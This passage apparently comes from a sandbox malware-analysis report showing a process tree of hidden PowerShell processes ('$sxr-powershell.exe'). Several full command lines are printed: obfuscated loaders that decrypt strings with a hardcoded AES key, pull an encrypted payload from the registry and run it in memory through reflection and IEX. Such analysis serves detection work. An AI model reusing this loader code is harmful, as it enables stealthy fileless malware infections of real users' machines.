-join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5076
                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4888
                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:60
                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join 